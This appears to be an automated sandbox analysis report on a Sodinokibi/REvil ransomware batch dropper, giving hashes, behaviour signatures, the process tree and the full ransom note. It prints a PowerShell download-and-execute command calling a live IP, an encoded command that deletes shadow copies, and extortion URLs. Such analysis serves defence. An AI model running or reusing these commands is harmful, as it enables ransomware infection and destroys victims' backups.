Analysis

  • max time kernel
    147s
  • max time network
    164s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    30-04-2020 18:10

General

  • Target

    Muz2mJiJ.bat

  • Size

    189B

  • MD5

    bb4861fd9b1cd958fbdd63202aaf58a1

  • SHA1

    2646649376f6f3d50a9c2c07e1cad41e7100c17c

  • SHA256

    c3db21a3bdac87c8d424b99e8982e5ab86b8f648e7ec7c9268ea50621aa0c718

  • SHA512

    c6813ea6762f16b446d053073ada0da7417e0160f265c9ed8244d6fd233b7c5c122ca9a5662076fd7afdc5644e0bd6d059cf3542142a5c3ff228574f41d909a8

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/Muz2mJiJ

Extracted

Path

C:\sm4at8zor-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. OSTEAD. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension sm4at8zor. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F69439FE956460C6 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F69439FE956460C6 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: eEC/jy8ctC0qOI8fRKRujf//4moCs9RF2hn3w8EIELxT92JiJdu1t7e5jHQaAUEQ FDpSmWVLuGA7VqEQNqzSSSunt++vsVxpgMjZVqvDZ4tEZ8SAYWCK32cicTn4TfXr 5Nw1YI3evYf+E4UuAwdsn+GafooTUCGV4zGtww55eyHdhC7BhUc3V82xzbzweaLA TaaZEKy1yOUGwaLQTuueJv0jcrlW0aH4D45LBaeQEuEC7mdgly5ekqAoPT5nG41j vduZUNtaRDelI0vRKfaT/KwKOA9MpJolNhuCOwIy1kAtIKAM1G4i3QddWoRKlFnN JYIinOKmI74agQvztfiyFa4ct8b1Z8lJldke+VEdpGCUmkEG3O/BEAOzUUjJBc0v gBb5k72Y8IhxhuJe+yvP+8wd/Y3y6drl8fi4pcYW81SboGXnWdzklVs8DM4t5Mbu ElhnvuHjp06clsARvwhTiHNPr88LeJCEPi/uASbsNWnvjxMCmM1hsTMCwfwTNavt a09PiF/CqBO0HMIV0yRY0M7LTz5nUiskdPTLltjawbYLR8kvhk3ZqD2NTzjSVuK2 8YbMSy53AjeYLimOf+dQ+pvnF73feLQotuq+L46tzWhfCiaudGrWzFqribZ3G17Y sGMDIef/DYB/ZN9/XvfhI/VJPZ+QgaZ7BH2PZaNXjm64WSULpFgGiaOqckXcPCaI 4bAYG0QTur8esozCnLhefIrX4Dum9rlMrpx0tIAX+h0/d+g98waV02FKoU9ox5Zo H0F0OjbFA8KoAv/Ljfm96kfaJPlGYXlbdlEkSx9/IXqn667MhuJAF198Ql+TJip+ hHTFignIeQCpsl9kM/6WSaylkYGwfp3oejhINVhYpTmzkwRzA/Fa4ydtCFU+wBfx JCmYrZ520aYdoM6P1pBkyPPu7gbPuc1lG2DrnwKla6VMnIL/Ch0ttXqmtq+SQ1xg ldyk2gi9y2CfNv9VlwZ3nayj8fZQx60AX8WuywD7t8OHfX0UhTQIgR4BTryhOGTk xP6Sh5sJWViXn1oSA9sqoLxU7QEg5b7avRaDnCY0v8Vlz8fzoMyY7OH5J8j+iPxc mZxQ9TrcjLPsqZRnWDSYmmkGzca1QsyVR3tQtQOH0E0bDh2qJHMv20EKU7j8p3N8 7JBMVzljLaq3QjBsugxirrSkTpiNfrRH7qwkBu63J+zEs1smMjVUylFaNg4QJCdT GzAPpPO/JGCtv+f2JU+qjCv+/JvHERRSa0bjhXKkX2uzyNqJbz99L8kB054qpV08 27febau3wSwNqp0If1204EoPX9TqljVWTgWZyz4puXEpp8Qf1qI= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F69439FE956460C6

http://decryptor.cc/F69439FE956460C6

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Makes http(s) request 35 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Drops file in Program Files directory 26 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 107 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Muz2mJiJ.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Muz2mJiJ');Invoke-KFSFPL;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Modifies system certificate store
      • Sets desktop wallpaper using registry
      PID:364
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:268
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1620

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms